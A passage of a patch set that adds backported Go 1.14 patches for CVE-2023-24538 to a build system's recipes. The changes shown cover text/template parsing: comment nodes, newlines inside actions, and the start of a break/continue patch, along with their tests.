91+ newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
92+ if err != nil {
93+ t.Fatalf("Cannot parse template text: %v", err)
94+ }
95+ c.root, err = c.root.AddParseTree("root", newT)
96+ if err != nil {
97+ t.Fatalf("Cannot add parse tree to template: %v", err)
98+ }
99+ c.mustExecute(c.root, nil, "1")
100+}
101+
102 type testCase struct {
103 t *testing.T
104 root *Template
105diff --git a/src/text/template/exec.go b/src/text/template/exec.go
106index ac3e741..7ac5175 100644
107--- a/src/text/template/exec.go
108+++ b/src/text/template/exec.go
109@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
110 if len(node.Pipe.Decl) == 0 {
111 s.printValue(node, val)
112 }
113+ case *parse.CommentNode:
114 case *parse.IfNode:
115 s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
116 case *parse.ListNode:
117diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
118index 30371f2..e41373a 100644
119--- a/src/text/template/parse/lex.go
120+++ b/src/text/template/parse/lex.go
121@@ -41,6 +41,7 @@ const (
122 itemBool // boolean constant
123 itemChar // printable ASCII character; grab bag for comma etc.
124 itemCharConstant // character constant
125+ itemComment // comment text
126 itemComplex // complex constant (1+2i); imaginary is just a number
127 itemAssign // equals ('=') introducing an assignment
128 itemDeclare // colon-equals (':=') introducing a declaration
129@@ -112,6 +113,7 @@ type lexer struct {
130 leftDelim string // start of action
131 rightDelim string // end of action
132 trimRightDelim string // end of action with trim marker
133+ emitComment bool // emit itemComment tokens.
134 pos Pos // current position in the input
135 start Pos // start position of this item
136 width Pos // width of last rune read from input
137@@ -203,7 +205,7 @@ func (l *lexer) drain() {
138 }
139
140 // lex creates a new scanner for the input string.
141-func lex(name, input, left, right string) *lexer {
142+func lex(name, input, left, right string, emitComment bool) *lexer {
143 if left == "" {
144 left = leftDelim
145 }
146@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
147 leftDelim: left,
148 rightDelim: right,
149 trimRightDelim: rightTrimMarker + right,
150+ emitComment: emitComment,
151 items: make(chan item),
152 line: 1,
153 startLine: 1,
154@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
155 if !delim {
156 return l.errorf("comment ends before closing delimiter")
157 }
158+ if l.emitComment {
159+ l.emit(itemComment)
160+ }
161 if trimSpace {
162 l.pos += trimMarkerLen
163 }
164diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
165index 563c4fc..f6d5f28 100644
166--- a/src/text/template/parse/lex_test.go
167+++ b/src/text/template/parse/lex_test.go
168@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
169 itemBool: "bool",
170 itemChar: "char",
171 itemCharConstant: "charconst",
172+ itemComment: "comment",
173 itemComplex: "complex",
174 itemDeclare: ":=",
175 itemEOF: "EOF",
176@@ -90,6 +91,7 @@ var lexTests = []lexTest{
177 {"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
178 {"text with comment", "hello-{{/* this is a comment */}}-world", []item{
179 mkItem(itemText, "hello-"),
180+ mkItem(itemComment, "/* this is a comment */"),
181 mkItem(itemText, "-world"),
182 tEOF,
183 }},
184@@ -311,6 +313,7 @@ var lexTests = []lexTest{
185 }},
186 {"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
187 mkItem(itemText, "hello-"),
188+ mkItem(itemComment, "/* hello */"),
189 mkItem(itemText, "-world"),
190 tEOF,
191 }},
192@@ -389,7 +392,7 @@ var lexTests = []lexTest{
193
194 // collect gathers the emitted items into a slice.
195 func collect(t *lexTest, left, right string) (items []item) {
196- l := lex(t.name, t.input, left, right)
197+ l := lex(t.name, t.input, left, right, true)
198 for {
199 item := l.nextItem()
200 items = append(items, item)
201@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
202 func TestShutdown(t *testing.T) {
203 // We need to duplicate template.Parse here to hold on to the lexer.
204 const text = "erroneous{{define}}{{else}}1234"
205- lexer := lex("foo", text, "{{", "}}")
206+ lexer := lex("foo", text, "{{", "}}", false)
207 _, err := New("root").parseLexer(lexer)
208 if err == nil {
209 t.Fatalf("expected error")
210diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
211index 1c116ea..a9dad5e 100644
212--- a/src/text/template/parse/node.go
213+++ b/src/text/template/parse/node.go
214@@ -70,6 +70,7 @@ const (
215 NodeTemplate // A template invocation action.
216 NodeVariable // A $ variable.
217 NodeWith // A with action.
218+ NodeComment // A comment.
219 )
220
221 // Nodes.
222@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
223 return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
224 }
225
226+// CommentNode holds a comment.
227+type CommentNode struct {
228+ NodeType
229+ Pos
230+ tr *Tree
231+ Text string // Comment text.
232+}
233+
234+func (t *Tree) newComment(pos Pos, text string) *CommentNode {
235+ return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
236+}
237+
238+func (c *CommentNode) String() string {
239+ var sb strings.Builder
240+ c.writeTo(&sb)
241+ return sb.String()
242+}
243+
244+func (c *CommentNode) writeTo(sb *strings.Builder) {
245+ sb.WriteString("{{")
246+ sb.WriteString(c.Text)
247+ sb.WriteString("}}")
248+}
249+
250+func (c *CommentNode) tree() *Tree {
251+ return c.tr
252+}
253+
254+func (c *CommentNode) Copy() Node {
255+ return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
256+}
257+
258 // PipeNode holds a pipeline with optional declaration
259 type PipeNode struct {
260 NodeType
261diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
262index c9b80f4..496d8bf 100644
263--- a/src/text/template/parse/parse.go
264+++ b/src/text/template/parse/parse.go
265@@ -21,6 +21,7 @@ type Tree struct {
266 Name string // name of the template represented by the tree.
267 ParseName string // name of the top-level template during parsing, for error messages.
268 Root *ListNode // top-level root of the tree.
269+ Mode Mode // parsing mode.
270 text string // text parsed to create the template (or its parent)
271 // Parsing only; cleared after parse.
272 funcs []map[string]interface{}
273@@ -29,8 +30,16 @@ type Tree struct {
274 peekCount int
275 vars []string // variables defined at the moment.
276 treeSet map[string]*Tree
277+ mode Mode
278 }
279
280+// A mode value is a set of flags (or 0). Modes control parser behavior.
281+type Mode uint
282+
283+const (
284+ ParseComments Mode = 1 << iota // parse comments and add them to AST
285+)
286+
287 // Copy returns a copy of the Tree. Any parsing state is discarded.
288 func (t *Tree) Copy() *Tree {
289 if t == nil {
290@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
291 func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
292 defer t.recover(&err)
293 t.ParseName = t.Name
294- t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
295+ emitComment := t.Mode&ParseComments != 0
296+ t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
297 t.text = text
298 t.parse()
299 t.add()
300@@ -240,12 +250,14 @@ func (t *Tree) add() {
301 }
302 }
303
304-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
305+// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
306 func IsEmptyTree(n Node) bool {
307 switch n := n.(type) {
308 case nil:
309 return true
310 case *ActionNode:
311+ case *CommentNode:
312+ return true
313 case *IfNode:
314 case *ListNode:
315 for _, node := range n.Nodes {
316@@ -276,6 +288,7 @@ func (t *Tree) parse() {
317 if t.nextNonSpace().typ == itemDefine {
318 newT := New("definition") // name will be updated once we know it.
319 newT.text = t.text
320+ newT.Mode = t.Mode
321 newT.ParseName = t.ParseName
322 newT.startParse(t.funcs, t.lex, t.treeSet)
323 newT.parseDefinition()
324@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
325 }
326
327 // textOrAction:
328-// text | action
329+// text | comment | action
330 func (t *Tree) textOrAction() Node {
331 switch token := t.nextNonSpace(); token.typ {
332 case itemText:
333 return t.newText(token.pos, token.val)
334 case itemLeftDelim:
335 return t.action()
336+ case itemComment:
337+ return t.newComment(token.pos, token.val)
338 default:
339 t.unexpected(token, "input")
340 }
341@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
342
343 block := New(name) // name will be updated once we know it.
344 block.text = t.text
345+ block.Mode = t.Mode
346 block.ParseName = t.ParseName
347 block.startParse(t.funcs, t.lex, t.treeSet)
348 var end Node
349diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
350index 4e09a78..d9c13c5 100644
351--- a/src/text/template/parse/parse_test.go
352+++ b/src/text/template/parse/parse_test.go
353@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
354 testParse(true, t)
355 }
356
357+func TestParseWithComments(t *testing.T) {
358+ textFormat = "%q"
359+ defer func() { textFormat = "%s" }()
360+ tests := [...]parseTest{
361+ {"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
362+ {"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
363+ {"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
364+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
365+ }
366+ for _, test := range tests {
367+ t.Run(test.name, func(t *testing.T) {
368+ tr := New(test.name)
369+ tr.Mode = ParseComments
370+ tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
371+ if err != nil {
372+ t.Errorf("%q: expected error; got none", test.name)
373+ }
374+ if result := tmpl.Root.String(); result != test.result {
375+ t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
376+ }
377+ })
378+ }
379+}
380+
381 type isEmptyTest struct {
382 name string
383 input string
384@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
385 {"empty", ``, true},
386 {"nonempty", `hello`, false},
387 {"spaces only", " \t\n \t\n", true},
388+ {"comment only", "{{/* comment */}}", true},
389 {"definition", `{{define "x"}}something{{end}}`, true},
390 {"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
391 {"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
392--
3932.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
new file mode 100644
index 0000000000..d5e2eb6684
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
1From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Thu, 10 Sep 2020 18:53:26 -0400
4Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
5
6This allows multiline constructs like:
7
8 {{"hello" |
9 printf}}
10
11Now that unclosed actions can span multiple lines,
12track and report the start of the action when reporting errors.
13
14Also clean up a few "unexpected <error message>" to be just "<error message>".
15
16Fixes #29770.
17
18Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
19Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
20Trust: Russ Cox <rsc@golang.org>
21Run-TryBot: Russ Cox <rsc@golang.org>
22TryBot-Result: Go Bot <gobot@golang.org>
23Reviewed-by: Rob Pike <r@golang.org>
24
25Dependency Patch #4
26
27Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
28CVE: CVE-2023-24538
29Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
30---
31 src/text/template/doc.go | 21 ++++-----
32 src/text/template/exec_test.go | 2 +-
33 src/text/template/parse/lex.go | 84 +++++++++++++++++------------------
34 src/text/template/parse/lex_test.go | 2 +-
35 src/text/template/parse/parse.go | 59 +++++++++++++-----------
36 src/text/template/parse/parse_test.go | 36 ++++++++++++---
37 6 files changed, 117 insertions(+), 87 deletions(-)
38
39diff --git a/src/text/template/doc.go b/src/text/template/doc.go
40index 4b0efd2..7b30294 100644
41--- a/src/text/template/doc.go
42+++ b/src/text/template/doc.go
43@@ -40,16 +40,17 @@ More intricate examples appear below.
44 Text and spaces
45
46 By default, all text between actions is copied verbatim when the template is
47-executed. For example, the string " items are made of " in the example above appears
48-on standard output when the program is run.
49-
50-However, to aid in formatting template source code, if an action's left delimiter
51-(by default "{{") is followed immediately by a minus sign and ASCII space character
52-("{{- "), all trailing white space is trimmed from the immediately preceding text.
53-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
54-(" -}}"), all leading white space is trimmed from the immediately following text.
55-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
56-action containing the number -3.
57+executed. For example, the string " items are made of " in the example above
58+appears on standard output when the program is run.
59+
60+However, to aid in formatting template source code, if an action's left
61+delimiter (by default "{{") is followed immediately by a minus sign and white
62+space, all trailing white space is trimmed from the immediately preceding text.
63+Similarly, if the right delimiter ("}}") is preceded by white space and a minus
64+sign, all leading white space is trimmed from the immediately following text.
65+In these trim markers, the white space must be present:
66+"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
67+"{{-3}}" parses as an action containing the number -3.
68
69 For instance, when executing the template whose source is
70
71diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
72index b8a809e..3309b33 100644
73--- a/src/text/template/exec_test.go
74+++ b/src/text/template/exec_test.go
75@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
76 t.Fatal("expected error")
77 }
78 str := err.Error()
79- if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
80+ if !strings.Contains(str, "X:3: unterminated raw quoted string") {
81 t.Fatalf("unexpected error: %s", str)
82 }
83 }
84diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
85index e41373a..6784071 100644
86--- a/src/text/template/parse/lex.go
87+++ b/src/text/template/parse/lex.go
88@@ -92,15 +92,14 @@ const eof = -1
89 // If the action begins "{{- " rather than "{{", then all space/tab/newlines
90 // preceding the action are trimmed; conversely if it ends " -}}" the
91 // leading spaces are trimmed. This is done entirely in the lexer; the
92-// parser never sees it happen. We require an ASCII space to be
93-// present to avoid ambiguity with things like "{{-3}}". It reads
94+// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
95+// to be present to avoid ambiguity with things like "{{-3}}". It reads
96 // better with the space present anyway. For simplicity, only ASCII
97-// space does the job.
98+// does the job.
99 const (
100- spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
101- leftTrimMarker = "- " // Attached to left delimiter, trims trailing spaces from preceding text.
102- rightTrimMarker = " -" // Attached to right delimiter, trims leading spaces from following text.
103- trimMarkerLen = Pos(len(leftTrimMarker))
104+ spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
105+ trimMarker = '-' // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
106+ trimMarkerLen = Pos(1 + 1) // marker plus space before or after
107 )
108
109 // stateFn represents the state of the scanner as a function that returns the next state.
110@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
111
112 // lexer holds the state of the scanner.
113 type lexer struct {
114- name string // the name of the input; used only for error reports
115- input string // the string being scanned
116- leftDelim string // start of action
117- rightDelim string // end of action
118- trimRightDelim string // end of action with trim marker
119- emitComment bool // emit itemComment tokens.
120- pos Pos // current position in the input
121- start Pos // start position of this item
122- width Pos // width of last rune read from input
123- items chan item // channel of scanned items
124- parenDepth int // nesting depth of ( ) exprs
125- line int // 1+number of newlines seen
126- startLine int // start line of this item
127+ name string // the name of the input; used only for error reports
128+ input string // the string being scanned
129+ leftDelim string // start of action
130+ rightDelim string // end of action
131+ emitComment bool // emit itemComment tokens.
132+ pos Pos // current position in the input
133+ start Pos // start position of this item
134+ width Pos // width of last rune read from input
135+ items chan item // channel of scanned items
136+ parenDepth int // nesting depth of ( ) exprs
137+ line int // 1+number of newlines seen
138+ startLine int // start line of this item
139 }
140
141 // next returns the next rune in the input.
142@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
143 right = rightDelim
144 }
145 l := &lexer{
146- name: name,
147- input: input,
148- leftDelim: left,
149- rightDelim: right,
150- trimRightDelim: rightTrimMarker + right,
151- emitComment: emitComment,
152- items: make(chan item),
153- line: 1,
154- startLine: 1,
155+ name: name,
156+ input: input,
157+ leftDelim: left,
158+ rightDelim: right,
159+ emitComment: emitComment,
160+ items: make(chan item),
161+ line: 1,
162+ startLine: 1,
163 }
164 go l.run()
165 return l
166@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
167 ldn := Pos(len(l.leftDelim))
168 l.pos += Pos(x)
169 trimLength := Pos(0)
170- if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
171+ if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
172 trimLength = rightTrimLength(l.input[l.start:l.pos])
173 }
174 l.pos -= trimLength
175@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
176
177 // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
178 func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
179- if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
180+ if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
181 return true, true
182 }
183 if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
184@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
185 // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
186 func lexLeftDelim(l *lexer) stateFn {
187 l.pos += Pos(len(l.leftDelim))
188- trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
189+ trimSpace := hasLeftTrimMarker(l.input[l.pos:])
190 afterMarker := Pos(0)
191 if trimSpace {
192 afterMarker = trimMarkerLen
193@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
194
195 // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
196 func lexRightDelim(l *lexer) stateFn {
197- trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
198+ trimSpace := hasRightTrimMarker(l.input[l.pos:])
199 if trimSpace {
200 l.pos += trimMarkerLen
201 l.ignore()
202@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
203 return l.errorf("unclosed left paren")
204 }
205 switch r := l.next(); {
206- case r == eof || isEndOfLine(r):
207+ case r == eof:
208 return l.errorf("unclosed action")
209 case isSpace(r):
210 l.backup() // Put space back in case we have " -}}".
211@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
212 }
213 // Be careful about a trim-marked closing delimiter, which has a minus
214 // after a space. We know there is a space, so check for the '-' that might follow.
215- if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
216+ if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
217 l.backup() // Before the space.
218 if numSpaces == 1 {
219 return lexRightDelim // On the delim, so go right to that.
220@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
221 // day to implement arithmetic.
222 func (l *lexer) atTerminator() bool {
223 r := l.peek()
224- if isSpace(r) || isEndOfLine(r) {
225+ if isSpace(r) {
226 return true
227 }
228 switch r {
229@@ -657,15 +654,18 @@ Loop:
230
231 // isSpace reports whether r is a space character.
232 func isSpace(r rune) bool {
233- return r == ' ' || r == '\t'
234-}
235-
236-// isEndOfLine reports whether r is an end-of-line character.
237-func isEndOfLine(r rune) bool {
238- return r == '\r' || r == '\n'
239+ return r == ' ' || r == '\t' || r == '\r' || r == '\n'
240 }
241
242 // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
243 func isAlphaNumeric(r rune) bool {
244 return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
245 }
246+
247+func hasLeftTrimMarker(s string) bool {
248+ return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
249+}
250+
251+func hasRightTrimMarker(s string) bool {
252+ return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
253+}
254diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
255index f6d5f28..6510eed 100644
256--- a/src/text/template/parse/lex_test.go
257+++ b/src/text/template/parse/lex_test.go
258@@ -323,7 +323,7 @@ var lexTests = []lexTest{
259 tLeft,
260 mkItem(itemError, "unrecognized character in action: U+0001"),
261 }},
262- {"unclosed action", "{{\n}}", []item{
263+ {"unclosed action", "{{", []item{
264 tLeft,
265 mkItem(itemError, "unclosed action"),
266 }},
267diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
268index 496d8bf..5e6e512 100644
269--- a/src/text/template/parse/parse.go
270+++ b/src/text/template/parse/parse.go
271@@ -24,13 +24,14 @@ type Tree struct {
272 Mode Mode // parsing mode.
273 text string // text parsed to create the template (or its parent)
274 // Parsing only; cleared after parse.
275- funcs []map[string]interface{}
276- lex *lexer
277- token [3]item // three-token lookahead for parser.
278- peekCount int
279- vars []string // variables defined at the moment.
280- treeSet map[string]*Tree
281- mode Mode
282+ funcs []map[string]interface{}
283+ lex *lexer
284+ token [3]item // three-token lookahead for parser.
285+ peekCount int
286+ vars []string // variables defined at the moment.
287+ treeSet map[string]*Tree
288+ actionLine int // line of left delim starting action
289+ mode Mode
290 }
291
292 // A mode value is a set of flags (or 0). Modes control parser behavior.
293@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
294
295 // unexpected complains about the token and terminates processing.
296 func (t *Tree) unexpected(token item, context string) {
297+ if token.typ == itemError {
298+ extra := ""
299+ if t.actionLine != 0 && t.actionLine != token.line {
300+ extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
301+ if strings.HasSuffix(token.val, " action") {
302+ extra = extra[len(" in action"):] // avoid "action in action"
303+ }
304+ }
305+ t.errorf("%s%s", token, extra)
306+ }
307 t.errorf("unexpected %s in %s", token, context)
308 }
309
310@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
311 case itemText:
312 return t.newText(token.pos, token.val)
313 case itemLeftDelim:
314+ t.actionLine = token.line
315+ defer t.clearActionLine()
316 return t.action()
317 case itemComment:
318 return t.newComment(token.pos, token.val)
319@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
320 return nil
321 }
322
323+func (t *Tree) clearActionLine() {
324+ t.actionLine = 0
325+}
326+
327 // Action:
328 // control
329 // command ("|" command)*
330@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
331 t.backup()
332 token := t.peek()
333 // Do not pop variables; they persist until "end".
334- return t.newAction(token.pos, token.line, t.pipeline("command"))
335+ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
336 }
337
338 // Pipeline:
339 // declarations? command ('|' command)*
340-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
341+func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
342 token := t.peekNonSpace()
343 pipe = t.newPipeline(token.pos, token.line, nil)
344 // Are there declarations or assignments?
345@@ -430,12 +447,9 @@ decls:
346 }
347 for {
348 switch token := t.nextNonSpace(); token.typ {
349- case itemRightDelim, itemRightParen:
350+ case end:
351 // At this point, the pipeline is complete
352 t.checkPipeline(pipe, context)
353- if token.typ == itemRightParen {
354- t.backup()
355- }
356 return
357 case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
358 itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
359@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
360
361 func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
362 defer t.popVars(len(t.vars))
363- pipe = t.pipeline(context)
364+ pipe = t.pipeline(context, itemRightDelim)
365 var next Node
366 list, next = t.itemList()
367 switch next.Type() {
368@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
369
370 token := t.nextNonSpace()
371 name := t.parseTemplateName(token, context)
372- pipe := t.pipeline(context)
373+ pipe := t.pipeline(context, itemRightDelim)
374
375 block := New(name) // name will be updated once we know it.
376 block.text = t.text
377@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
378 if t.nextNonSpace().typ != itemRightDelim {
379 t.backup()
380 // Do not pop variables; they persist until "end".
381- pipe = t.pipeline(context)
382+ pipe = t.pipeline(context, itemRightDelim)
383 }
384 return t.newTemplate(token.pos, token.line, name, pipe)
385 }
386@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
387 switch token := t.next(); token.typ {
388 case itemSpace:
389 continue
390- case itemError:
391- t.errorf("%s", token.val)
392 case itemRightDelim, itemRightParen:
393 t.backup()
394 case itemPipe:
395+ // nothing here; break loop below
396 default:
397- t.errorf("unexpected %s in operand", token)
398+ t.unexpected(token, "operand")
399 }
400 break
401 }
402@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
403 // A nil return means the next item is not a term.
404 func (t *Tree) term() Node {
405 switch token := t.nextNonSpace(); token.typ {
406- case itemError:
407- t.errorf("%s", token.val)
408 case itemIdentifier:
409 if !t.hasFunction(token.val) {
410 t.errorf("function %q not defined", token.val)
411@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
412 }
413 return number
414 case itemLeftParen:
415- pipe := t.pipeline("parenthesized pipeline")
416- if token := t.next(); token.typ != itemRightParen {
417- t.errorf("unclosed right paren: unexpected %s", token)
418- }
419- return pipe
420+ return t.pipeline("parenthesized pipeline", itemRightParen)
421 case itemString, itemRawString:
422 s, err := strconv.Unquote(token.val)
423 if err != nil {
424diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
425index d9c13c5..220f984 100644
426--- a/src/text/template/parse/parse_test.go
427+++ b/src/text/template/parse/parse_test.go
428@@ -250,6 +250,13 @@ var parseTests = []parseTest{
429 {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
430 {"block definition", `{{block "foo" .}}hello{{end}}`, noError,
431 `{{template "foo" .}}`},
432+
433+ {"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
434+ {"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
435+ {"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
436+ {"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
437+ {"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
438+
439 // Errors.
440 {"unclosed action", "hello{{range", hasError, ""},
441 {"unmatched end", "{{end}}", hasError, ""},
442@@ -426,23 +433,38 @@ var errorTests = []parseTest{
443 // Check line numbers are accurate.
444 {"unclosed1",
445 "line1\n{{",
446- hasError, `unclosed1:2: unexpected unclosed action in command`},
447+ hasError, `unclosed1:2: unclosed action`},
448 {"unclosed2",
449 "line1\n{{define `x`}}line2\n{{",
450- hasError, `unclosed2:3: unexpected unclosed action in command`},
451+ hasError, `unclosed2:3: unclosed action`},
452+ {"unclosed3",
453+ "line1\n{{\"x\"\n\"y\"\n",
454+ hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
455+ {"unclosed4",
456+ "{{\n\n\n\n\n",
457+ hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
458+ {"var1",
459+ "line1\n{{\nx\n}}",
460+ hasError, `var1:3: function "x" not defined`},
461 // Specific errors.
462 {"function",
463 "{{foo}}",
464 hasError, `function "foo" not defined`},
465- {"comment",
466+ {"comment1",
467 "{{/*}}",
468- hasError, `unclosed comment`},
469+ hasError, `comment1:1: unclosed comment`},
470+ {"comment2",
471+ "{{/*\nhello\n}}",
472+ hasError, `comment2:1: unclosed comment`},
473 {"lparen",
474 "{{.X (1 2 3}}",
475 hasError, `unclosed left paren`},
476 {"rparen",
477- "{{.X 1 2 3)}}",
478- hasError, `unexpected ")"`},
479+ "{{.X 1 2 3 ) }}",
480+ hasError, `unexpected ")" in command`},
481+ {"rparen2",
482+ "{{(.X 1 2 3",
483+ hasError, `unclosed action`},
484 {"space",
485 "{{`x`3}}",
486 hasError, `in operand`},
487@@ -488,7 +510,7 @@ var errorTests = []parseTest{
488 hasError, `missing value for parenthesized pipeline`},
489 {"multilinerawstring",
490 "{{ $v := `\n` }} {{",
491- hasError, `multilinerawstring:2: unexpected unclosed action`},
492+ hasError, `multilinerawstring:2: unclosed action`},
493 {"rangeundefvar",
494 "{{range $k}}{{end}}",
495 hasError, `undefined variable`},
496--
4972.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
new file mode 100644
index 0000000000..fc38929648
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
1From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Thu, 20 May 2021 12:46:33 -0400
4Subject: [PATCH 5/6] html/template, text/template: implement break and
5 continue for range loops
6
7Break and continue for range loops was accepted as a proposal in June 2017.
8It was implemented in CL 66410 (Oct 2017)
9but then rolled back in CL 92155 (Feb 2018)
10because html/template changes had not been implemented.
11
12This CL reimplements break and continue in text/template
13and then adds support for them in html/template as well.
14
15Fixes #20531.
16
17Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
